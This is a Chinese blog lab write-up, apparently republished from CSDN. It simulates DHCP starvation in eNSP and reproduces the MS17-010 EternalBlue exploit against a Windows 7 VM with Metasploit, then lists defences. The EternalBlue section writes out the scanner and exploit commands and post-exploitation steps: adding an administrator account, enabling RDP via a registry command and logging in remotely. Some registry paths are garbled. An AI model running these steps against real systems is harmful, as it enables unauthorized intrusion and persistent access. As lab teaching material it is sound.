本文介绍: 只做模拟机器使用,不使用真实机器目录一、 DHCP饿死和防护应对措施……………………………. 11, 实验拓扑:……………………………………………… 22, 实验配置…………………………………………………. 22.1删改设备名字…………………………………….. 2

只做模拟机器使用,不使用真实机器

目录

一、 DHCP饿死和防护应对措施……………………………. 1

1, 实验拓扑:……………………………………………… 2

2, 实验配置…………………………………………………. 2

2.1删改设备名字…………………………………….. 2

2.2配置dhcp服务器……………………………….. 2

3,防护方案:……………………………………………….. 4

二、MS17-010漏洞复现………………………………………… 6

漏洞的简介…………………………………………………….. 6

实验环境………………………………………………………… 7

1,扫描主机:………………………………………………………. 7

2, 使用msf的永恒之蓝攻击模块………………………… 8

3,先使用扫描模块3:…………………………………………. 9

4,然后使用攻击模块……………………………………………. 9

5, 对靶机进行控制:………………………………………… 10

防范措施1:一旦中病毒首先拔掉网线….. 12

防范措施2:安装杀毒软件,立即给电脑打补丁………………………………………………………….. 13

防范措施3:Windows用户可手动关闭端口和网络共享……………………………………………. 13

防范措施4:尽快将你所有重要文档资料云端备份…………………………………………………… 13

防范措施5:小心驶得万年船………………… 14

#每日安全简讯#(20231128)

1.研究人员发现新型窃密木马Rude Stealer

http://t.cn/A6WFKy5c

2.数百所学校使用应用程序泄露了儿童数据

http://t.cn/A6WFKy5q

3.Windows Hello 指纹技术黑客入侵

http://t.cn/A6WFKy55 ​​​

信息来源:国家计算机病毒应急处理中心

以下我将模拟如何进行DHCP饿死攻击操作

操作环境:ENSP,KALI操作系统 192.168.169.2/24 ,在系统创建一张网卡kali一个网段kali地址也是通过网卡自动获取所以ip不准确,要去kali里面ifconfig查看ip地址

注意:一定要不要用自己wlan网卡。

  1. 实验拓扑:

  1. 实验配置

2.1删改设备名字

<Huawei&gt;sy             //进入系统视图

Enter system view, return user view with Ctrl+Z.

[Huawei]sy DHCPserver            //更改设备名字

[DHCPserver]dhcp enable         //开启DHCP功能

2.2配置dhcp服务器

[DHCPserver]ip pool PC             //配置地址名字

[DHCPserverippool-PC]gatewaylist 192.168.169.1    //配置地址网关

[DHCPserverippool-PC]network 192.168.169.0 mask 255.255.255.0    //配置网段

[DHCPserverippool-PC]excludedipaddress 192.168.169.128     //配置排除地址

[DHCPserverippool-PC] dnslist 114.114.114.114        //配置DNS服务器地址

  1. Kali端配置:

查看kaliip地址

4,安装运行攻击模块

语法 dhcpstarv   –i  网卡名称(我这里eth0                      

一次他会给你一个安装提示选择y这里如果安装不了先把kali的网卡配置成可上网的那张在切换

运行

5,返回ensp查看DHCP服务器

你会发现此时你的地址池可用已经空了

重置IP pool                                              

reset ip pool name PC all 用户视图下敲                

3防护方案

  1. 给PC绑定ip地址(ip地址和MAC地址进行绑定),进入DHCPserver

查看pc端的MAC地址

进入地址池配置                                         

staticbind ip-a ddress 192.168.169.250 macaddress 5489-9836-63F1

没有静态配置之前的:

对比分配之后的:

kali进行攻击之后:

但此时你pc已经最开始由静态获取了,但是这种的话,比较死板,如果有很多台pc要配置很多句static

  1. 加上端口安全的配置在交换机上面。

#

interface GigabitEthernet0/0/1

 portsecurity enable

port-security maxmacnum  1 //最大可以学习MAC1

 port-security protect-action shutdown    //如果超过1物理关掉这个接口

#

连接终端的口上配置端口安全

效果

二、MS17-010漏洞复现

漏洞的简介

  1. 永恒之蓝介绍
    MS17-010(永恒之蓝漏洞),永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制入侵计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复文件。不过在该病毒出来不久就被微软通过打补丁修复

2.什么是SMB协议

        SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器请求/响应协议通过SMB协议可以计算机共享文件、打印机命名管道资源电脑上的网上邻居就是靠SMB实现的;SMB协议工作应用层会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

3.SMB工作原理什么

     (1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本返回0XFFFFH,结束通信

     (2):协议确定后,客户端进程服务器发起一个用户共享认证这个过程通过发送SessetupX请求数据包实现的。客户端发送一对用户名密码一个简单码到服务器然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接

      (3):当客户端服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问网络资源名称,之后会发送一个TconX应答数据报以表示此次连接是否接收拒绝

      (4):连接到相应资源后,SMB客户端能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

实验环境

复现环境

攻击端Kali (192.168.108.128),靶机win7(192.168.108.212)

实验条件采用nat模式,不能使用桥接网卡!Win7的防火墙关闭的!

复现过程:

1扫描主机

Namp 192.168.108.0/24    //进入kali使用嗅探工具nmap探测本网段存活主机数。

找到靶机的ip地址,并且查看它的445端口是不是开放的,而永恒之蓝使用的就是445端口的smb服务操作系统溢出漏洞。

  1. 使用msf的永恒之蓝攻击模块

打开msfmsfconsole

搜索ms17-010漏洞的工具search ms17-010

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,      

exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块  
一般配合使用,前者先扫描,若显示有漏洞,再进行攻击

结果显示0,1,4是exploit漏洞利用模块 2,3Auxiliary辅助模块

3,先使用扫描模块

use auxiliary/scanner/smb/smb_ms17_010

使用show options 可以查看改模块可配置的内容

设置目标ip地址:

set rhosts 192.168.108.212                                               

然后执行run

出现 Host is likely VULNERABLE to MS17-010! – Windows 7 Enterprise 7600 x64 (64-bit)

说明系统存在ms17-010系统漏洞,并且这是一个windows7x64的系统

4然后使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue                             

设置攻击目标ip地址:192.168.108.212

可以使用show options查看设置选项

设置攻击目标ip:

set rhosts 192.168.108.212                                            

执行run或者expolit

看到已经拿到了靶机的shell

  1. 对靶机进行控制:

创建一个用户:net user lwh 123456 /add                  

查看用户信息net user                                    

看到添加成功了

将用户lwh添加管理员组:net localgroup administrators lwh /add        

效果

开启远程桌面功能

这里首先查看3389端口状态:netstat -ano                             

默认可能没有

输入下面命令开启3389端口:

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f              

                                    

效果:

3389端口开启

远程桌面连接靶机:

另开一个命令行

执行rdesktop 192.168.102.212:3389                                 

效果输入账户密码登录成功:

┌──(rootkali)-[/home/kali]                                          

└─# rdesktop 192.168.108.212:3389                                     

以上这个简单实验只是告诉大家这个漏洞很危险,真正的攻击能做的事情远不止这些。

防范措施1:一旦中病毒首先拔掉网线

    首先黑客是通过网络来对你实施攻击,所以只要断网就能物理进行一个隔离

网络安全专家郑文彬向重案组37号解释,此方案确实可行。因为非专业人士,个人无法判断电脑是否开放445等端口,可先拔开网线,阻碍病毒入侵然后安装补丁,再将文件进行备份后,最后重新联网。但最关键是尽快将电脑系统升级或使用光盘安装补丁,修复系统漏洞

防范措施2安装杀毒软件,立即给电脑打补丁

      在Windows电脑上安装运行杀毒软件扫描,同时启用Windows Update针对“永恒之蓝”勒索病毒微软发布了专门的修复补丁 “MS17-010”, 用以修复被 “ Eternal Blue” 攻击的系统漏洞,用户可以自行下载对应操作系统版本的补丁进行安装,记得把补丁下载本地,重要资料所在电脑采用断网打补丁形式。

防范措施3:Windows用户可手动关闭端口和网络共享

      默认状态下,Windows 的 135、139、445 端口处于开放状态,135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机运行程序可以顺利地执行远程计算机上的代码,使用DCOM可以通过网络直接进行通信能够跨包括HTTP协议在内的多种网络传输。 WannaCry 正是通过这些端口来进行大规模传播的,因此用户也可以选择手动关闭以上端口以及关闭网络共享方法如下

1.关闭135端口

2.关闭 135、137、138 端口

在网络邻居上点右键属性,在新建好的连接上点本地连接,选属性再选择网络选项卡去掉“Microsoft 网络的文件和打印机共享 “Microsoft 网络客户端复选框。这样就关闭了共享 135 137 还有 138端口

3.关闭 139 端口

139 端口是 NetBIOS Session 端口,用来文件和打印共享。关闭 139 方法是在网络和共享中心本地连接选取“Internet协议 (TCP/IP)”属性,进入高级”TCP/IP 设置“WINS” 选项卡设置里面有一项禁用 TCP/IP NETBIOS ”,打勾就可关闭 139 端口。

4.关闭 445 端口

开始→运行输入 “regedit”打开注册表编辑器,确定后定位到 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters新建名为“SMBDeviceEnabled”的DWORD值,并将其设置为 0,则可关闭 445 端口。

防范措施4:尽快将你所有重要文档资料云端备份

      养成定期文档备份习惯是非常重要的事情。在你的电脑未感染前,请将电脑中的所有重要文档进行云端备份。重要Word、PDF等小文件但需要高频使用的,比如你的论文、科研报告研究资料工作资料等,可通过WPS或者百度云盘进行云端备份,方便你随时在PC端或移动端查看和编辑

防范措施5:小心驶得万年船

1.加强自身防护

首先及时更新操作系统漏洞补丁、程序软件、杀毒软件病毒库。启用并打开“Windows防火墙”,进入“高级设置”,在入站规则禁用“文件和打印机共享”相关规则

2.对于不明邮件和下载的文件先杀毒扫描后使用。

原文地址:https://blog.csdn.net/qq_62449917/article/details/134749410

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_35364.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注